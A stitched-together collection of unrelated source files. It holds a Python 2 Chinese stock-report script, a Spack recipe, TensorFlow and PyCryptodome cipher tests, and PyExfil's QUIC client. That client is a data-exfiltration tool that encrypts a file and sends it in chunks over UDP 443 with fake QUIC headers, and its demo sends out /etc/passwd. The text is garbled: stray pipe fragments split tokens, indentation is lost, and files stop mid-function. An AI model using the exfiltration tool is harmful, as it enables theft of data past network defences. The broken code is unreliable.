            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag)
        elif desc == "ZT":
            cxFlag += ' ' + itm_lst[10]
            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag, itm_lst[9])
        elif desc == "ZTHL":
            cxFlag += ' ' + itm_lst[11]
            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag, itm_lst[9], itm_lst[10])
        # Output is gbk-encoded for the Windows console (py2 file).
        if isinstance(str, unicode): str = str.encode('gbk')
        print str
        i += 1
        if i > number:
            break
    print endstr
def show_dt_info(dt_list, desc, fmt, pconfig):
    """Print a formatted table of limit-down ("DT") style rows.

    Mirror of show_zt_info() for desc values "DT", "YZDT" and "DTFT";
    NOTE(review): the two could plausibly be merged (see comment above
    show_zt_info in the original file).
    """
    number = len(dt_list)
    endstr = ''
    str = "%s [%d]:" % (desc, number)
    if number <= 0:
        return
    elif pconfig['NotAllInfo'] == 0:
        # 0 means "print everything": effectively unlimited.
        number = 10000
    elif number > 30:
        number = 30
        endstr = '......'
    df = pd.DataFrame(dt_list)
    # Sort either by time column (9/7) or by percent, depending on config.
    if pconfig['SortByTime'] == 1:
        if desc == "DT":
            df = df.sort_values([9, 7], 0, True)
        elif desc == "DTFT":
            df = df.sort_values([9, 7], 0, True)
        else:
            df = df.sort_values([7], 0, True)
    else:
        if desc == "DT":
            df = df.sort_values([7, 9], 0, [False, True])
        elif desc == "YZDT":
            df = df.sort_values([7], 0, False)
        elif desc == "DTFT":
            df = df.sort_values([2, 7], 0, False)
    i = 1
    if isinstance(str, unicode): str = str.encode('gbk')
    print str
    for index, itm_lst in df.iterrows():
        # Mark "new listing" rows (column 8 = days since listing).
        cxFlag = ''
        if itm_lst[8] < CX_DAYS:
            cxFlag = 'CX'
        if desc == "YZDT":
            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag)
        elif desc == "DT":
            cxFlag += ' ' + itm_lst[10]
            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag, itm_lst[9])
        elif desc == "DTFT":
            cxFlag += ' ' + itm_lst[11]
            str = fmt % (i, itm_lst[0], itm_lst[1], itm_lst[2], itm_lst[3], itm_lst[4], itm_lst[5], itm_lst[6], itm_lst[7], cxFlag, itm_lst[9], itm_lst[10])
        # Output is gbk-encoded for the console (py2 file).
        if isinstance(str, unicode): str = str.encode('gbk')
        print str
        i += 1
        if i > number:
            break
    print endstr
#fmt1 = "%2d %6s %-7s %8.2f %8.2f %8.2f %8.2f %8.2f %4d %3s"
def show_tuishi_info(tuis_list, fmt):
number=len(tuis_list)
desc = "TUISHI [%d]"%(number)
print desc
for i in range(len(tuis_list)):
props = tuis_list[i]
#print props
high = round(float(props[11]),2)
low = round(float(props[12]),2)
open = round(float(props[10]),2)
price = round(float | (props[3]),2)
pre_close = round(float(props[9]),2)
volume = int(props[8])
o_percent = (open-pre_close)*100/pre_close
c_percent = (price-pre_clos | e)*100/pre_close
h_percent = (high-pre_close)*100/pre_close
l_percent = (low-pre_close)*100/pre_close
open_percent = spc_round2(o_percent,2)
change_percent = spc_round2(c_percent,2)
high_zf_percent = spc_round2(h_percent,2)
low_df_percent = spc_round2(l_percent,2)
stk_list = [0, 0]
count = 0
stat = ''
if high==low:
if price>pre_close:
count = get_zf_days(props[1], 1, trade_date, 1, stk_list)
stat = 'YZZT'
else:
count = get_zf_days(props[1], 2, trade_date, 1, stk_list)
stat = 'YZDT'
desc = fmt % (i+1,props[1],props[2],change_percent,price,o_percent,high_zf_percent,low_df_percent,count,stat)
print desc.encode('gbk')
print ""
def filter_dtft(dtft_list, perc):
    """Count rows whose percent field (index 2) is strictly above *perc*."""
    if not dtft_list:
        return 0
    return sum(1 for item in dtft_list if item[2] > perc)
def handle_argument():
    """Parse command-line flags into the module-level ``param_config`` dict.

    Supported flags: -h (help), -d <date> (target trade date),
    -t (sort output by time), -l (disable the log file).
    """
    optlist, args = getopt.getopt(sys.argv[1:], 'htld:')
    for option, value in optlist:
        if option in ["-h", "--help"]:
            param_config["Help"] = 1
        elif option in ["-d", "--date"]:
            param_config["Date"] = value
        elif option in ["-t", "--time"]:
            param_config["SortByTime"] = 1
        elif option in ["-l", "--nolog"]:
            param_config["NoLog"] = 1
    #print param_config
# Global runtime options; mutated in place by handle_argument() from CLI flags.
param_config = {
    "Help":0,        # -h: print usage and exit
    "Date":'',       # -d: trading date to analyse ([YYYY]MMDD)
    "NoLog":0,       # -l: do not tee stdout into the report file
    "NoDetail":0,
    "NotAllInfo":0,
    "SortByTime":0,  # -t: sort output by time
    "TuiShi":0,
}
# Base directory for generated report/log files.
REAL_PRE_FD = "../data/"
#Main Start:
if __name__=='__main__':
beginTm = datetime.datetime.now()
sysstr = platform.system()
flname = REAL_PRE_FD + "realtime.txt"
#TODO: open the comment
if os.path.isfile(flname):
os.remove(flname)
sys.stdout = Logger_IO(flname)
handle_argument()
if param_config["Help"]==1 or param_config["Date"]=='':
print("%s -d([.][YYYY]MMDD))"%(os.path.basename(__file__)))
exit(0)
ret, his_date = parseDate2(param_config["Date"])
if ret==-1:
exit(0)
t_fmt = '%s %02d:%02d'
fmt_time = t_fmt %(his_date, beginTm.hour, beginTm.minute)
print "TIME:",fmt_time
updPath = '../data/daily/' + his_date +"/"+ his_date + "up_nm.txt"
updFile = open(updPath, "r")
hisLists = json.load(updFile, encoding='gbk')
updFile.close()
jc_dict = {}
read_tfp_fh_in_tips(his_date, jc_dict)
show_idx = ['000001', '399001', '399005', '399006','399678']
show_real_index(show_idx)
print his_date
stcsItem=statisticsItem()
pre_date = get_preday(1, his_date)
preStatItem = statisticsItem()
ret = parse_realtime_his_file(pre_date, preStatItem)
if ret == -1:
print("Error:No find matched item", pre_date)
exit(0)
#print(preStatItem.lst_non_yzcx_yzzt)
st_dict = {}
st_dict['fup_stk'] = jc_dict['fupai']
st_dict['new_stk'] = jc_dict['newmrk']
st_dict['all_stk'] = hisLists
st_dict['nkb_stk'] = []
st_dict['tui_stk'] = []
today_open = []
collect_all_stock_data_pre(st_dict, today_open, stcsItem, preStatItem, his_date)
non_cx_yz = len(stcsItem.lst_non_yzcx_yzzt)
cx_yz = stcsItem.s_yzzt-non_cx_yz
#»ñÈ¡Êý¾Ý½øÐдòÓ¡
str_opn = "[%d %d %d %d] %3d ÉÏ,%3d ÏÂ" % (stcsItem.s_open_zt,stcsItem.s_close_zt,stcsItem.s_open_T_zt,stcsItem.s_dk_zt, stcsItem.s_sw_zt, stcsItem.s_xw_zt)
if sysstr == "Linux":
str_opn = str_opn.decode('gbk').encode('utf-8')
str_dt = "%d DTKP" % (stcsItem.s_open_dt)
if stcsItem.s_yzdt>0:
str_dt = "%s, %d YZDT" % (str_dt, stcsItem.s_yzdt)
if stcsItem.s_open_dt_dk>0:
str_dt = "%s, %d DTDK" % (str_dt, stcsItem.s_open_dt_dk)
DaoT = stcsItem.s_open_dt-stcsItem.s_yzdt-stcsItem.s_open_dt_dk
if DaoT>0:
str_dt = "%s, %d DaoT " % (str_dt, DaoT)
print " ST(%d ZT %d DT) %s" % (stcsItem.s_st_yzzt, stcsItem.s_st_yzdt, str_dt)
#print " ST(%d ZT %d DT) DTKP:%d YZDT:%d DTDK:%d" % (stcsItem.s_st_yzzt, stcsItem.s_st_yzdt, stcsItem.s_open_dt, stcsItem.s_yzdt,stcsItem.s_open_dt_dk)
dtft_qiang = filter_dtft(stcsItem.lst_dtft, -3)
print "%4 |
iulian787/spack | var/spack/repos/builtin/packages/r-combinat/package.py | Python | lgpl-2.1 | 598 | 0.003344 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. S | ee the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RCombinat(RPackage):
    """routines for combinatorics"""

    # CRAN landing page, release tarball, and archive listing for older versions.
    homepage = "https://cloud.r-project.org/package=combinat"
    url = "https://cloud.r-project.org/src/contrib/combinat_0.0-8.tar.gz"
    list_url = "https://cloud.r-project.org/src/contrib/Archive/combinat/"

    # Release known to Spack, pinned by checksum.
    version('0.0-8', sha256='1513cf6b6ed74865bfdd9f8ca58feae12b62f38965d1a32c6130bef810ca30c1')
ZhangXinNan/tensorflow | tensorflow/contrib/optimizer_v2/rmsprop_test.py | Python | apache-2.0 | 18,899 | 0.010635 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rmsprop optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import math
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.optimizer_v2 import rmsprop
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
# Floating-point dtypes each parameterized test case is run under.
_DATA_TYPES = [dtypes.half, dtypes.float32]

# One row per RMSProp configuration exercised by the tests below.
_TEST_PARAM_VALUES = [
    # learning_rate, decay, momentum, epsilon, centered, use_resource
    [0.5, 0.9, 0.0, 1.0, True, False],
    [0.5, 0.9, 0.0, 1.0, False, False],
    [0.5, 0.9, 0.0, 1.0, True, True],
    [0.5, 0.9, 0.0, 1.0, False, True],
    [0.1, 0.9, 0.0, 1.0, True, False],
    [0.5, 0.95, 0.0, 1.0, False, False],
    [0.5, 0.8, 0.0, 1e-3, True, False],
    [0.5, 0.8, 0.9, 1e-3, True, False],
]
class RMSPropOptimizerTest(test.TestCase, parameterized.TestCase):
def _rmsprop_update_numpy(self, var, g, mg, rms, mom, lr, decay, momentum,
centered):
rms_t = rms * decay + (1 - decay) * g * g
if centered:
mg_t = mg * decay + (1 - decay) * g
denom_t = rms_t - mg_t * mg_t
else:
mg_t = mg
denom_t = rms_t
mom_t = momentum * mom + lr * g / np.sqrt(denom_t, dtype=denom_t.dtype)
var_t = var - mom_t
return var_t, mg_t, rms_t, mom_t
def _sparse_rmsprop_update_numpy(self, var, gindexs, gvalues, mg, rms, mom,
lr, decay, momentum, centered):
mg_t = copy.deepcopy(mg)
rms_t = copy.deepcopy(rms)
mom_t = copy.deepcopy(mom)
var_t = copy.deepcopy(var)
for i in range(len(gindexs)):
gindex = gindexs[i]
gvalue = gvalues[i]
rms_t[gindex] = rms[gindex] * decay + (1 - decay) * gvalue * gvalue
denom_t = rms_t[gindex]
if centered:
mg_t[gindex] = mg_t[gindex] * decay + (1 - decay) * gvalue
denom_t -= mg_t[gindex] * mg_t[gindex]
mom_t[gindex] = momentum * mom[gindex] + lr * gvalue / np.sqrt(denom_t)
var_t[gindex] = var[gindex] - mom_t[gindex]
return var_t, mg_t, rms_t, mom_t
@parameterized.named_parameters(
*test_util.generate_combinations_with_testcase_name(
dtype=_DATA_TYPES, param_value=_TEST_PARAM_VALUES))
def testDense(self, dtype, param_value):
(learning_rate, decay, momentum, epsilon, centered, use_resource) = tuple(
param_value)
with self.test_session(use_gpu=True):
# Initialize variables for numpy implementation.
var0_np = np.array([1.0, 2.0], dtype=dtype.as_numpy_dtype)
grads0_np = np.array([0.1, 0.2], dtype=dtype.as_numpy_dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype.as_numpy_dtype)
grads1_np = np.array([0.01, 0.2], dt | ype=dtype.as_numpy_dtype)
if use_resource:
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
else:
var0 = variables.Variable(var0_np)
var1 = variables.Variable(var1_np)
grads0 = constant_op.constant(grads0_np)
grads1 = constant_op.constant(grads1_np)
opt = rmsprop.RMSPropOptimizer(
learning_rate=learning_rate,
decay=de | cay,
momentum=momentum,
epsilon=epsilon,
centered=centered)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
mg0 = opt.get_slot(var0, "mg")
self.assertEqual(mg0 is not None, centered)
mg1 = opt.get_slot(var1, "mg")
self.assertEqual(mg1 is not None, centered)
rms0 = opt.get_slot(var0, "rms")
self.assertIsNotNone(rms0)
rms1 = opt.get_slot(var1, "rms")
self.assertIsNotNone(rms1)
mom0 = opt.get_slot(var0, "momentum")
self.assertIsNotNone(mom0)
mom1 = opt.get_slot(var1, "momentum")
self.assertIsNotNone(mom1)
mg0_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
mg1_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
rms0_np = np.array([epsilon, epsilon], dtype=dtype.as_numpy_dtype)
rms1_np = np.array([epsilon, epsilon], dtype=dtype.as_numpy_dtype)
mom0_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
mom1_np = np.array([0.0, 0.0], dtype=dtype.as_numpy_dtype)
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 4 steps of RMSProp
for _ in range(4):
update.run()
var0_np, mg0_np, rms0_np, mom0_np = self._rmsprop_update_numpy(
var0_np, grads0_np, mg0_np, rms0_np, mom0_np, learning_rate,
decay, momentum, centered)
var1_np, mg1_np, rms1_np, mom1_np = self._rmsprop_update_numpy(
var1_np, grads1_np, mg1_np, rms1_np, mom1_np, learning_rate,
decay, momentum, centered)
# Validate updated params
if centered:
self.assertAllCloseAccordingToType(mg0_np, mg0.eval())
self.assertAllCloseAccordingToType(mg1_np, mg1.eval())
self.assertAllCloseAccordingToType(rms0_np, rms0.eval())
self.assertAllCloseAccordingToType(rms1_np, rms1.eval())
self.assertAllCloseAccordingToType(mom0_np, mom0.eval())
self.assertAllCloseAccordingToType(mom1_np, mom1.eval())
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
@parameterized.parameters([dtypes.float32, dtypes.float64])
def testMinimizeSparseResourceVariable(self, dtype):
with self.test_session():
var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = rmsprop.RMSPropOptimizer(
learning_rate=1.0,
decay=0.0,
momentum=0.0,
epsilon=0.0,
centered=False).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType([[1.0, 2.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run()
# Validate updated params
self.assertAllCloseAccordingToType(
[[0., 1.]], var0.eval(), atol=0.01)
@parameterized.parameters([dtypes.float32, dtypes.float64])
def testMinimizeSparseResourceVariableCentered(self, dtype):
with self.test_session():
var0 = resource_variable_ops.ResourceVariable([[1.0, 2.0]], dtype=dtype)
x = constant_op.constant([[4.0], [5.0]], dtype=dtype)
pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x)
loss = pred * pred
sgd_op = rmsprop.RMSPropOptimizer(
learning_rate=1.0,
decay=0.1,
momentum=0.0,
epsilon=1.0,
centered=True).minimize(loss)
variables.global_variables_initializer().run()
# Fetch params to validate initial values
self.assertAllCloseAccordingToType([[1.0, 2.0]], var0.eval())
# Run 1 step of sgd
sgd_op.run( |
antoinecarme/pyaf | tests/artificial/transf_Quantization/trend_LinearTrend/cycle_5/ar_/test_artificial_128_Quantization_LinearTrend_5__100.py | Python | bsd-3-clause | 270 | 0.085185 | import py | af.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "LinearTrend | ", cycle_length = 5, transform = "Quantization", sigma = 0.0, exog_count = 100, ar_order = 0); |
ytisf/PyExfil | pyexfil/network/QUIC/quic_client.py | Python | mit | 6,330 | 0.004265 |
import sys
import time
import socket
import struct
import random
import hashlib
import urllib2
from Crypto import Random
from Crypto.Cipher import AES
# from itertools import izip_longest
# Setting timeout so that we won't wait forever
timeout = 2
socket.setdefaulttimeout(timeout)
limit = 256*256*256*256 - 1
def md5(fname):
    """Return the hex MD5 digest of the file at *fname*, read in 4 KiB blocks."""
    digest = hashlib.md5()
    with open(fname, "rb") as handle:
        while True:
            block = handle.read(4096)
            if not block:
                break
            digest.update(block)
    return digest.hexdigest()
def chunkstring(s, n):
    """Split *s* into consecutive pieces of length *n*.

    The final piece may be shorter when len(s) is not a multiple of *n*.
    Uses ``range`` rather than the Python-2-only ``xrange`` so the helper
    works unchanged on both Python 2 and Python 3 (on Python 2 ``range``
    merely materialises a small index list here).
    """
    return [s[i:i + n] for i in range(0, len(s), n)]
class AESCipher(object):
    """AES-256-CBC helper: key = SHA-256 of the passphrase, random IV per message.

    Ciphertext layout: 16-byte IV followed by the CBC-encrypted, padded payload.
    Padding is PKCS7-style but to a 32-byte boundary (self.bs) — 32 is a
    multiple of the 16-byte AES block size, so CBC still accepts it, and
    _unpad recovers the original length from the last padding byte.
    """

    def __init__(self, key):
        # Pad/align unit for _pad (NOT the AES block size, which is 16).
        self.bs = 32
        # Derive a fixed-length 256-bit key from an arbitrary passphrase.
        self.key = hashlib.sha256(key.encode()).digest()

    def encrypt(self, raw):
        """Pad *raw* and return IV + AES-CBC ciphertext (binary string)."""
        raw = self._pad(raw)
        iv = Random.new().read(AES.block_size)
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return iv + cipher.encrypt(raw)

    def decrypt(self, enc):
        """Inverse of encrypt(): strip the IV, decrypt, unpad, decode UTF-8."""
        # enc = base64.b64decode(enc)
        iv = enc[:AES.block_size]
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')

    def _pad(self, s):
        # PKCS7-style: append N copies of chr(N), N in 1..bs.
        return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)

    @staticmethod
    def _unpad(s):
        # Last byte encodes the pad length; slice it (and the pad) off.
        return s[:-ord(s[len(s)-1:])]
class QUICClient():
    """Exfiltration client that wraps AES-encrypted file chunks in
    QUIC-looking UDP datagrams (default port 443).

    Per-packet wire format (see _getQUICHeader): 1 byte public flags
    (0x0c), the 8-byte connection sequence, 1 byte packet counter, then
    the AES-CBC ciphertext produced by AESCipher.

    NOTE(review): this module is Python 2 only (``except IOError, e``
    syntax, byte/str mixing).
    """

    def __init__(self, host, key, port=443, max_size=4096):
        # Params for all class
        self.host = host
        self.port = port
        # Reserve 60 bytes of headroom for header + padding overhead.
        self.max_size = max_size - 60
        self.AESDriver = AESCipher(key=key)
        self.serv_addr = (host, port)

        # Class Globals
        self.max_packets = 255  # Limitation by QUIC itself.
        self._genSeq()  # QUIC Sequence is used to know that this is the same sequence,
                        # and it's a 20 byte long that is kept the same through out the
                        # session and is transfered hex encoded.
        self.delay = 0.1
        self.sock = None
        # NOTE(review): ``is 1`` relies on CPython small-int interning;
        # ``== 1`` would be the robust comparison.
        if self._createSocket() is 1:  # Creating a UDP socket object
            sys.exit(1)
        self.serv_addr = (self.host, self.port)  # Creating socket addr format

    def _genSeq(self):
        """Generate the 64-bit session sequence and pack it as two LE 32-bit words."""
        self.raw_sequence = random.getrandbits(64)
        parts = []
        # Split the 64-bit value into 32-bit limbs (``limit`` = 2**32 - 1).
        while self.raw_sequence:
            parts.append(self.raw_sequence & limit)
            self.raw_sequence >>= 32
        self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
        # struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4')
        return 0

    def _createSocket(self):
        """Create the UDP socket; return 0 on success, 1 on failure."""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            self.sock = sock
            return 0
        except socket.error as e:
            sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e)
            return 1

    def _getQUICHeader(self, count):
        """Build the 10-byte pseudo-QUIC header for packet number *count*.

        Returns the header string, or 1 on invalid input.
        NOTE(review): ``type(count) is not hex`` compares against the
        builtin ``hex`` function and is therefore always True; the else
        branch is unreachable.
        """
        if type(count) is not hex:
            try:
                count_id = chr(count)
            except:
                sys.stderr.write("Count must be int or hex.\n")
                return 1
        else:
            count_id = count

        if count > self.max_packets:
            sys.stderr.write("[-]\tCount must be maximum of 255.\n")
            return 1

        header = "\x0c"  # Public Flags
        header += self.sequence  # Adding CID
        header += count_id  # Packet Count
        return header

    def _getFileContent(self, file_path):
        """Read the whole file; return its bytes, or 1 on I/O error."""
        try:
            f = open(file_path, 'rb')
            data = f.read()
            f.close()
            sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path)
            return data
        except IOError, e:
            sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e))
            return 1

    def sendFile(self, file_path):
        """Exfiltrate *file_path*: an init packet (name;md5;count) followed by
        AES-encrypted chunks, one per datagram, paced by self.delay.

        Returns 0 on success, 1 on error.
        """
        # Get File content
        data = self._getFileContent(file_path)
        if data == 1:
            return 1

        # Check that the file is not too big.
        if len(data) > (self.max_packets * self.max_size):
            sys.stderr.write("[!]\tFile is too big for export.\n")
            return 1

        # If the file is not too big, start exfiltration
        # Exfiltrate first packet
        md5_sum = md5(file_path)  # Get MD5 sum of file
        packets_count = (len(data) / self.max_size)+1  # Total packets
        first_packet = self._getQUICHeader(count=0)  # Get header for first file
        r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count)  # First header
        r_data = self.AESDriver.encrypt(r_data)  # Encrypt data
        self.sock.sendto(first_packet + r_data, self.serv_addr)  # Send the data
        sys.stdout.write("[+]\tSent initiation packet.\n")

        # encrypted_content = self.AESDriver.encrypt(data)
        # Encrypt the Chunks
        raw_dat = ""
        chunks = []
        while data:
            raw_dat += data[:self.max_size]
            enc_chunk = self.AESDriver.encrypt(data[:self.max_size])
            print len(enc_chunk)
            chunks.append(enc_chunk)
            data = data[self.max_size:]

        # Packet counter starts at 1; 0 was the initiation packet.
        i = 1
        for chunk in chunks:
            this_data = self._getQUICHeader(count=i)
            this_data += chunk
            self.sock.sendto(this_data, self.serv_addr)
            time.sleep(self.delay)
            sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count))
            i += 1

        sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port))
        # self.sequence = struct.pack('<' + 'L'*len(parts), *parts)
        return 0

    def close(self):
        """Close the UDP socket after a short grace period."""
        time.sleep(0.1)
        self.sock.close()
        return 0
if __name__ == "__main__":
    # Demo: exfiltrate /etc/passwd to a local listener on UDP/443.
    client = QUICClient(host='127.0.0.1', key="123", port=443)  # Setup a server
    a = struct.unpack('<LL', client.sequence)  # Get CID used
    # Recombine the two little-endian 32-bit words into the 64-bit CID.
    a = (a[1] << 32) + a[0]
    sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a)
    client.sendFile("/etc/passwd")  # Exfil File
    client.close()  # Close
|
Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/Cryptodome/SelfTest/Cipher/test_OCB.py | Python | gpl-2.0 | 25,029 | 0.00032 | # ===================================================================
#
# Copyright (c) 2014, Legrandin <helderijs@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ===================================================================
import os
import re
import unittest
from binascii import hexlify
from Cryptodome.Util.py3compat import b, tobytes, bchr, unhexlify
from Cryptodome.Util.strxor import strxor_c
from Cryptodome.Util.number import long_to_bytes
from Cryptodome.SelfTest.st_common import list_test_cases
from Cryptodome.Cipher import AES
from Cryptodome.Hash import SHAKE128
def get_tag_random(tag, length):
    """Return *length* deterministic pseudo-random bytes derived from *tag*.

    SHAKE128 of the tag gives reproducible "random" keys/nonces/payloads,
    so test vectors are stable across runs.
    """
    return SHAKE128.new(data=tobytes(tag)).read(length)
class OcbTests(unittest.TestCase):
key_128 = get_tag_random("key_128", 16)
nonce_96 = get_tag_random("nonce_128", 12)
data_128 = get_tag_random("data_128", 16)
def test_loopback_128(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
pt = get_tag_random("plaintext", 16 * 100)
ct, mac = cipher.encrypt_and_digest(pt)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
pt2 = cipher.decrypt_and_verify(ct, mac)
self.assertEqual(pt, pt2)
def test_nonce(self):
# Nonce is optional
AES.new(self.key_128, AES.MODE_OCB)
cipher = AES.new(self.key_128, AES.MODE_OCB, self.nonce_96)
ct = cipher.encrypt(self.data_128)
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(ct, cipher.encrypt(self.data_128))
def test_nonce_must_be_bytes(self):
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
nonce='test12345678')
def test_nonce_length(self):
# nonce cannot be empty
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=b(""))
# nonce can be up to 15 bytes long
for length in range(1, 16):
AES.new(self.key_128, AES.MODE_OCB, nonce=self.data_128[:length])
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.data_128)
def test_block_size_128(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(cipher.block_size, AES.block_size)
# By default, a 15 bytes long nonce is randomly generated
nonce1 = AES.new(self.key_128, AES.MODE_OCB).nonce
nonce2 = AES.new(self.key_128, AES.MODE_OCB).nonce
self.assertEqual(len(nonce1), 15)
self.assertNotEqual(nonce1, nonce2)
def test_nonce_attribute(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertEqual(cipher.nonce, self.nonce_96)
# By default, a 15 bytes long nonce is randomly generated
nonce1 = AES.new(self.key_128, AES.MODE_OCB).nonce
nonce2 = AES.new(self.key_128, AES.MODE_OCB).nonce
self.assertEqual(len(nonce1), 15)
self.assertNotEqual(nonce1, nonce2)
def test_unknown_parameters(self):
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
self.nonce_96, 7)
self.assertRaises(TypeError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, unknown=7)
# But some are only known by the base cipher
# (e.g. use_aesni consumed by the AES module)
AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96,
use_aesni=False)
def test_null_encryption_decryption(self):
for func in "encrypt", "de | crypt":
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
result = getattr(cipher, func)(b(""))
self.assertEqual(result, b(""))
def test_either_encrypt_or_decrypt(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
c | ipher.encrypt(b("xyz"))
self.assertRaises(TypeError, cipher.decrypt, b("xyz"))
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
cipher.decrypt(b("xyz"))
self.assertRaises(TypeError, cipher.encrypt, b("xyz"))
def test_data_must_be_bytes(self):
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(TypeError, cipher.encrypt, 'test1234567890-*')
cipher = AES.new(self.key_128, AES.MODE_OCB, nonce=self.nonce_96)
self.assertRaises(TypeError, cipher.decrypt, 'test1234567890-*')
def test_mac_len(self):
# Invalid MAC length
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, mac_len=7)
self.assertRaises(ValueError, AES.new, self.key_128, AES.MODE_OCB,
nonce=self.nonce_96, mac_len=16+1)
# Valid MAC length
for mac_len in range(8, 16 + 1):
